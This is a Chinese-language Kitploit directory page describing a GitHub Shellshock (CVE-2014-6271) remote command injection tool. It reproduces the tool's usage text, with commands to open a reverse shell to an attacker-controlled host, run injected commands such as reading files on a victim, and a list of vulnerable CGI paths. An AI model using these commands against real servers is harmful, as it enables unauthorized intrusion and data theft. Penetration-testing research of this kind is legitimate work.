Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
-CVE-2014-6271-Shellshock-Remote-Command-Injection- — [CVE-2014-6271] Apache Shellshock 远程命令注入工具,用于快速反弹 Shell 和文件浏览 | Kitploit
工具/GitHubGitHub/filipstudeny/-cve-2014-6271-shellshock-remote-command-injection-
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubfilipstudeny/-cve-2014-6271-shellshock-remote-command-injection-

-CVE-2014-6271-Shellshock-Remote-Command-Injection-

[CVE-2014-6271] Apache Shellshock 远程命令注入工具,用于快速反弹 Shell 和文件浏览

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
314年前尚未审核

[CVE-2014-6271] Shellshock远程命令注入

[CVE-2014-6271] Apache Shellshock远程命令注入工具,用于快速反弹Shell和文件浏览

root@kitploit:~
Shellshock Apache远程利用

用法:
    ./Shellshock.py payload=reverse rhost=1.2.3.4 page=3 lhost=5.6.7.8 lport=1234
    ./Shellshock.py payload=files rhost=1.2.3.4 page=3 echo="ls -la"
    ./Shellshock.py payload=files rhost=1.2.3.4 page=3 echo="cat file.txt"

变量:
    受害者:
        rhost => 受害者IP
        rport => 受害者端口 
        
    攻击者(用于反弹Shell):
        lhost => 攻击者IP
        lport => 攻击者用于反弹Shell的端口 
    
    Echo:
        echo => 自定义要注入的命令
        
        示例:
            echo="ls -la"
            echo="cat file.txt"
        
    配置:
        pages => 特定存在漏洞的CGI页面 
            可利用的页面:
                [0] /cgi-sys/entropysearch.cgi",
                [1] /cgi-sys/defaultwebpage.cgi",
                [2] /cgi-mod/index.cgi",
                [3] /cgi-bin/test.cgi",
                [4] /cgi-bin-sdb/printenv            
    载荷:
        "reverse" => (Unix通用) TCP反弹Shell (需要:rhost, lhost, lport)
        "files" => 读取和浏览文件 (需要:rhost, echo)    
        
    作者:Filip Studený
下载工具